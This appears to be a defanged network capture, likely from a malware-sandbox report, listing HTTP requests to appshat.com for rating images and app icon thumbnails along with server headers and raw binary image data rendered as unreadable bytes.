...........0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I.
 [email protected]..._-...."[email protected]~..,/...;.
.m..%..h^[email protected].~<<E.........J.B[a.W}.g._.W.l.~<..
....$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..&
gt;.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?..
..D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/[email protected]..=p..
a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2...
.G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.
."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.X
H,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,  .......3...!.[.
[email protected].(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.
....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&
..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._.
.. .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).).
.4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.
n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC][email protected]....
..<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<< skipped >>>

GET /images/3.0stars.jpg HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/jpeg
Content-Length: 2022
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Connection: keep-alive
ETag: "5214ef07-7e6"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
......Exif..II*.................Ducky.......P..... hXXp://ns.adobe.com
/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c01
1 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="
hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.a
dobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:C0AD31E0CD1411E28C01DE2AF
24957C3" xmpMM:InstanceID="xmp.iid:C0AD31DFCD1411E28C01DE2AF24957C3" x
mp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFr
om stRef:instanceID="xmp.iid:D2ECCA94C82C11E2B97E98D68EE09333" stRef:d
ocumentID="xmp.did:D2ECCA95C82C11E2B97E98D68EE09333"/> </rdf:Des
cription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?
>....Adobe.d.......................................................
......................................................................
......................9...............................................
.........................................!..1...Aa"2qB3Q..Rbc$&.......
................!1A...a2....Qq."BR%...b..#...$............?....Y..n...
VN\..(.Yy..........L...\.(- ..V|.....3......N.*..6i<MSJ.X.".,..isy{
."....U......%t.6..W~..d.......IjP...T........#V..[..%.`.f._....Si....
.W"t.:...B=./.....%...E36e..3i^..a'.}h..E.Q..Wy........r...G.tQIU.!.C&
%.\.s.....s0M.n..s,[email protected]..$......&UD.{..z...?...n
<<< skipped >>>

GET /thumbnails/icon/images/assets/5/d/5dbc29649669598ff43174b9ee730008.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/png
Content-Length: 41466
Last-Modified: Thu, 13 Jun 2013 17:56:48 GMT
Connection: keep-alive
ETag: "51ba07e0-a1fa"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......sBIT....|.d.....pHYs.........B(.x
....tEXtSoftware.VVV.inkscape.org..<... .IDATx...wx......]....{....
.j.)..K.@B .` |..PB...K.....j:..eS....{..%...|.l....{ggvg..{....9..; e
.{.=...$..A..A..\...A..A.....A..A.BH...A.D/...A..A.BH...A.D/...A..A.BH
...A.D/...A..A.B<...A..A..s.......?x.....v...N.$.. ...y,...o.U.....
...p{<..v.V...A......W7.v......;.......1.....l%[email protected].=.....{..~./..
>._T..l.|[email protected].=..v=.....k....^n..`.... E..$... ."..a..'....k.q
[email protected].. . ..1h.....@...../.VB... .....c!..
...0~.a..V..c:i.4........J["$... .....B..S&_:..i........Y|.!.....@....
[email protected]=1P\t....E.WK.D#...~...
.....A....{.I..J.o)..........~....0....I...A.........J.o/.............
..k.......9....A.....O......[.k..c..!I.......|.....M......A..A..[.;...
....}j.r.\...:........P.s..... .. ....N...V_.,-...q.s9q...../.\..}....
9q.2..A.....c!6...fT......[[email protected]%....7)
...aC.Q... .. ..................~.DQ.|.^.....`Y..}.9}...... .....O8...
.........UhGQ..I.....w..(... .. ..........o ........`.E.....j.$... ...
.?.......`Y.TC.,...P..c.?x...... ......8.....&_..w....rl.....o.hW...o.
 .. .9..p.9R$......../IR.......>M3.v]nw..c.|A.>e... .B.{.:m..(..
...]....~.vK.j>.......$... .....L...1..`Y.....7..Q.o.nY]...:.|I...A
...7M9..~.... .......|.iB...5.u....k...A..A.p....*..."4t....-...s.@Y..
.@q.*..H...A...7M9dF.q.......cP .S.. [email protected]...,
..t...?9A....k.8.....I...A.D..X.=p.I...0.2......:.@. !=`.e.b.|/..B
<<< skipped >>>

GET /thumbnails/icon/images/assets/2/3/23428f8768d928d2bd45dd3b0c4d0057.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/png
Content-Length: 288086
Last-Modified: Fri, 14 Jun 2013 16:44:16 GMT
Connection: keep-alive
ETag: "51bb4860-46556"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR.............{.C.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:9D2D46458C206811B0C8A4DF2123BC4C" xmpMM:DocumentID="xmp.did:77F1
49EBC46E11E2B747C631FF1479F9" xmpMM:InstanceID="xmp.iid:77F149EAC46E11
E2B747C631FF1479F9" xmp:CreatorTool="Adobe Photoshop CS5.1 Macintosh"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0280117407206811A8
98904B6C307B73" stRef:documentID="xmp.did:9D2D46458C206811B0C8A4DF2123
BC4C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>6..i..a.IDATx...k.d.u%v...>2.....H....^.
.....v.x"..v.?.o.'..?h.c ..c4.([email protected]..^k..U.A..%....b...2...
U....k..GO...{.!..A....|p..U..X5uh.......U}....Z.........~...qip....Uk
7;.w..pq..g.4..7...\p....ir.8..2...;..&yT..........s5.^;7.....6..d....
.'."..L..<....M{..J..B...s..=..'..>.].._...O)xZy.$O..C.._.=.Y..&
lt;|.]..B.N)z~.,/.B.....z...W....../'.4f.f.J......[|.|*'#g2..4.....&."
. _.n....i.{goY.....).....^.n8.......M.....w{...uu.g...^.|....]<w..
......".*T.{7.....{...q.......R?..a..4MyJy..9......?.....y<...x
<<< skipped >>>

GET /thumbnails/icon/images/assets/f/1/f1ed3cd0cae7a3524376e6f9369c7ab8.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/png
Content-Length: 101632
Last-Modified: Tue, 18 Jun 2013 12:27:16 GMT
Connection: keep-alive
ETag: "51c05224-18d00"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR................l....pHYs................OiCCPPhotosho
p ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE.........
..Q,......!.........{.k........>...........H3Q5...B..........@..$p.
...d!s.#...~<< ".....x.....M..0.....B.\[email protected]..@F....
&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH..
...........0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I.
 [email protected]..._-...."[email protected]~..,/...;.
.m..%..h^[email protected].~<<E.........J.B[a.W}.g._.W.l.~<..
....$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..&
gt;.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?..
..D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/[email protected]..=p..
a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2...
.G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.
."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.X
H,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,  .......3...!.[.
[email protected].(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.
....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&
..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._.
.. .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).).
.4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.
n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC][email protected]....
..<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<< skipped >>>

GET /images/4.0stars.jpg HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/jpeg
Content-Length: 2194
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Connection: keep-alive
ETag: "5214ef07-892"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
......Exif..II*.................Ducky.......P..... hXXp://ns.adobe.com
/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c01
1 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http:
//ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/s
Type/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp
MM:InstanceID="xmp.iid:D2ECCA94C82C11E2B97E98D68EE09333" xmpMM:Documen
tID="xmp.did:D2ECCA95C82C11E2B97E98D68EE09333"> <xmpMM:DerivedFr
om stRef:instanceID="xmp.iid:D2ECCA92C82C11E2B97E98D68EE09333" stRef:d
ocumentID="xmp.did:D2ECCA93C82C11E2B97E98D68EE09333"/> </rdf:Des
cription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?
>....Adobe.d.......................................................
......................................................................
......................9...............................................
.......................................!..."..12BAQa..b3c&............
..........!.1A...a2...Qq."B.%.Rb...#.$............?....3s....b.v..Q@..
.\g.F^.v.G.`$.*.yAiX...............Zy.UU..Q.j.....7.3......2.F*""...].
.d......w.tl.!..=..I-J.U^J.R.Y...y.j.B.}Z"_S..0.>..>.=.X8......Q
.O.....<.../....."..R.......X..|.;..!Fkm].....7..I...e.9.E%T\......
s!.D.......Q..a...]PF^..U&....)..1F..i..(.6.Z..%J.............n...
<<< skipped >>>

GET /thumbnails/icon/images/assets/3/d/3d8bbea6bcae57d705c676f7050a7d51.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3



a.(M.....r. .c;..w..&.Cf..u.X......^P.....}.|(\|$x.....B@....<....#
...Y.x......[..h...A..ai..L.QVdG.....,......%....PT......98.....#.8...
.j..._.......-.~!...sN.....].t..Q..U.%......-.m..e..`.d.Sx...B.G2.....
..i....:L..X.K..@.;..SW....q.....P}.R.....se.. ....P......f.6.........
K.2"j9.Rbb.M...()..A.A=.<(<[email protected]....$9.c
....F|.ebkK...)/.).-........z..........c....e....d..PVS..X...|..I.^z..
..'.XRR2.dl...}.hk....|>].'MsX....p.F.'.Q.......Mf3..V..{....*....B
.._F....L....]U......a....0?......cR...r%c,...6.)4.`.Z..AJs.?C.x.oX.M.
.5...-`[email protected]\.A....0%......=..D..1G.3i].|.,.d.....&.......iA..y
...3ny .....qPZ....@......'N..//...{.=(...6o..s...f2.?`........K.,9...
.;...f.`8....4......:...g...v..cB..u.=.9.p.........E7x.............}..
...ir....AD. .....&..)..(Q...k...}....3............Wk..,.9<.J"AR...
.D".Fd.`b...{..VuW.t..<]b..z......._......\...."..ki.{J.....?.!....
..;6..,.B..~.D........., C.~f....fZ....}.y.......n.a;/......f,...A..0[
j....\%cY..}Q^8.t;.%`....j...z...@4.....`......C...................o.e
......'.I.y..u...w......9..6.........QLN....)..\..B.Yej........e&.....
Y..(..J...O.T...3.i.?"q"............?.,..vX.!...Z.rH...._..oJ..*.$....
...~.;.n..P0...8..w.......s..j..;.... /?....8Y..t.p)=......LN..7.....S
F..n...8ff..7R.....l................w..".9.....Z...x.....':..}P..'....
i..P.......onc..lC.Jw...q....7r...:..:.......^.0V.=l....6..0q.........
.I...?....7.%..<1..:...k..[.!.f..6.?."|O.@...~.3.pr..yN$..Y.......z
....{_.-n....L.......8{....!.b9>.5..lo.....L\.|.t.!Y..0]......w
<<< skipped >>>

GET /thumbnails/icon/images/assets/a/6/a6ae526a0a22dcfc743a66d44a3e09e3.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3



..MzJm...`....?.9....f`X.Y~...:.....O^.j..P.j..4..R....Jt.Vo|....A.&.,
[email protected]..&X....h..a....*..d.uk..W....h.v]I..D.Q.....o...........
It..E..W$.K'&(s....Q.../_..{F.o......|.d.V._v......J.t..9.y.l.1....i..
.)z.^.Dubr..i.Ln.f......<-.8..g..ym....C(.....4.'...n.kv..h8....b3a
.n._0$.&I.....=..L.T...r..V.a..`.V=.7.=.W..B4..%9P#Rqu8.'..a#...K...j.
M.....~6...P... ..-.......*..9.......H.C.....h.z.....\.k... .[.n....m.
au.....(...*....".B......'.."..a<b..t........99>.J/[email protected].
..9......ev...L.\...j.,.......3S.D3...*.]v.1R6...4..t..R...1.^s.....y.
......wX.{H.pq............$?y...K._n...V.AxTGH s._o...y...>...G..4.
.`s...r...L]........B..k.R...fhS....Z.........}..[..x./n[...08.7T.....
})......t...vG............. ......o<D...M..3....t.m.....>..s.a..
.0,d...b.v4s....M.......n[....n..}(.avq.kvyn&`$3.*QA...D..A...KvQ_..Y.
fNU..R.y.\\lX.EB......Jk.ve.RVL............e.......Jd..5%......8...S|.
)........?~Af`......&..GF.4.......0...On.gc.."...`...T....M."....W.]..
.....[...m..Y.9k..DS.B........D%.gFWT.....{mt.....k..42..4R.L.6.P..W..
b.AQf.&.K6}. >..;.v..........Ec...5.Zv.^...k..gkK.QR5hU!....'.4k..E
..E....XJQEsc...J}$.JW..K..X......J..V........_zr.U^.....]..!.:. j.a..
..`.Z.../........T.".Q,s.=...(1xR^.....s....3...S... ..... l{.f.VHwJ9.
.....?*|.....%.3.......E *.;.g.W.=....9.. .vKQO.[[email protected]
L..j..F.'.Z.FR..ib.#i....qE.<[}[email protected].._...............
$3.L....M..Jk..........."m\Q...P.B[%.d.xD.m(j.Y.mnm.&....!!.ez-q..5w.y
.7^.................'g....=.......g..]..2.b.P....h.Ui..;bO.......]
<<< skipped >>>

GET /images/3.5stars.jpg HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/jpeg
Content-Length: 37562
Last-Modified: Thu, 13 Jun 2013 17:46:06 GMT
Connection: keep-alive
ETag: "51ba055e-92ba"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
......JFIF.............C................................... $.' ",#..(
7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222
222222222222222222222...........".....................................
.......................}........!1A..Qa."q.2....#B...R..$3br........%&
'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................
......................................................................
.............................w.......!1..AQ.aq."2...B.....#3R..br...$4
.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................
................................................................?...i.
.*[email protected]..........
8.....'.....B..b....SU...X.....4.=k.?.s.7....9...R..WD...........=.;..
..ZO8z............N............M....rH=.;....Z<..^0................
..s..@..........'Z.v{_.=h...x...rG..O........$......_..aG$..S.{O.=h...
x..-..........(?.....I.......V?k.......<z....{.....................
..]W..bV"..{..=h...x?./)...^?........yO..B.......G..a.z}.w....x.....'$
..G...........]A..........%..Z.D.h....x.......u..@#....../.-..........
*yY|.=....y...o......................./.....9..~x................/....
....w..@#........2=....y...w.............................../<z...Z.
..Z....?.....Q...Z...G.......v......G.=k...k]......._..aI...^...G.....
..,...?<z...Z.Y.0\.pt........G...G.4.......W...c7Z.vl..<z...Z...
[._..?.....Ui.4........?.]..}........Z<..^................k...2]N[.
. ...l...t:rZ.J.6....x......C...........................6f...O<
<<< skipped >>>

GET /thumbnails/icon/images/assets/1/3/13ca8e322e15bc394d66a37bec12e3b4.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/png
Content-Length: 428661
Last-Modified: Thu, 13 Jun 2013 17:46:14 GMT
Connection: keep-alive
ETag: "51ba0566-68a75"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......tEXtSoftware.Adobe ImageReadyq.e&
lt;....iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:FD7F1174072068118C14E27DC24655EC" xmpMM:DocumentID="xmp.did:8786
860B6FBE11E195A29E3F354856C3" xmpMM:InstanceID="xmp.iid:8786860A6FBE11
E195A29E3F354856C3" xmp:CreatorTool="Adobe Photoshop CS6 (13.0 2012030
5.m.415 2012/03/05:21:00:00)  (Macintosh)"> <xmpMM:DerivedFrom s
tRef:instanceID="xmp.iid:FE7F1174072068118C14E27DC24655EC" stRef:docum
entID="xmp.did:FD7F1174072068118C14E27DC24655EC"/> </rdf:Descrip
tion> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
.hY....xIDATx...{...u.........2?..vb...qLk....$!.....r..mZ.........*..
...T.J.)...R.(.....ab.....I.43...n..}.......z.X._=c. .x..3....{...<
.Y......x]...u....:^..x}c].q....:^..x..#.8^..x...u........u....:^.....
..:^..x...u....x...u....:...u....:^..x....:^..x...u....x...u....:^G.p.
...:^..x..#.8^..x...u........u....:^.......:^..x...u....x...u....:...u
....:^..x....:^..x...u......y..y.......x....:^_zu.).....k...8e.....O.o
..x......q........_............*^{....x....... ..}.F......_8..f...
<<< skipped >>>

GET /thumbnails/icon/images/assets/d/a/da84c206c2019448521379d2ff837774.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3



........uR......4.......#..G_N....R.F....B.^"F.._f.".(,...d....9"...hU
....?....y.USPh...7.._.v(.....s%..*..k....05........s.7.^..k%}.c..4.5h
...)61.2$>}tb..y..q...R.C_/[email protected].^cm......ki...-.G.B....`/
[email protected].:L. .......q.h.. ...L`..[................M..B..W..?.....y
%5....\....BWFD...[.K.....5..S.......V..>.......r.S@.`P."h.....g.w*
.O..?e.9.....V.....h...f=.:.a. ...YDB.0......'....d.........Z..a......
."a_..b3.-..b.F........0J..|..1..<.~.....<xw...^(..":Z..n... ...
...#......0..&s;..\.x<[email protected]...~...\V.t........f..
.K...J..&...QZ....U&.S%...JV`.EO.\..."[email protected]"]b.*t....m..\e..
D.=p_xE....{>.E......m.?mV5.^..y..Py.k......w....kU...H.g...v'.....
.........i.r2Q.......(.....&.]wC....\..(.[....7J..<A..V}....Y.....z
<}rX..S.p4..F.%.X!...0g. ..>.."5,.\..h......L.....R.>./.3....
......q.5..&E....c.:..G...........3%.Du..@6=..l..1..?*.dh7}.3.1.....#.
.b^..*z.5...[.z..O6N.?}.dWPQ....Pw9.>U..B.g.?i...........DQ)._.,x.M
.h...#[email protected].=.1..TA..1.s...M.....F...A;.a(....^.rk...`J
!....V.........Mo..h... %[email protected].....
 <.`..LI...hC.]..?...A..A. [email protected]....*...V..kVP0..A....{0.S.T
...V..........Dn.rf...! 3..*......d...j........F......k. _.T......d.e.
@...... .y..O.y_.g......,.).........W^...@m.. L..,.dM.I..K.?..x*......
s.8.......}....8....{..2..r....d..\s<......u..Sa..<..lZ...9..v..
.2...6(5L&..#.>.....U.. Qgli......2Y..Y.6hKYJ.... .q....~\v.By_k.im
s.......0O....v.?...<.j...L.s...oD..H..O..C..:.....5.?.......#.
<<< skipped >>>

GET /thumbnails/icon/images/assets/5/9/59982d8527c0da41e35817e8fc15c0fc.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:41 GMT
Content-Type: image/png
Content-Length: 77988
Last-Modified: Sat, 15 Jun 2013 05:34:29 GMT
Connection: keep-alive
ETag: "51bbfce5-130a4"
Expires: Sun, 19 Apr 2015 00:06:41 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......pHYs...#...#.x.?v...OiCCPPhotosho
p ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE.........
..Q,......!.........{.k........>...........H3Q5...B..........@..$p.
...d!s.#...~<< ".....x.....M..0.....B.\[email protected]..@F....
&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH..
...........0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I.
 [email protected]..._-...."[email protected]~..,/...;.
.m..%..h^[email protected].~<<E.........J.B[a.W}.g._.W.l.~<..
....$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..&
gt;.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?..
..D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/[email protected]..=p..
a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2...
.G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.
."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.X
H,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,  .......3...!.[.
[email protected].(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.
....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&
..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._.
.. .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).).
.4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.
n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC][email protected]....
..<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<< skipped >>>

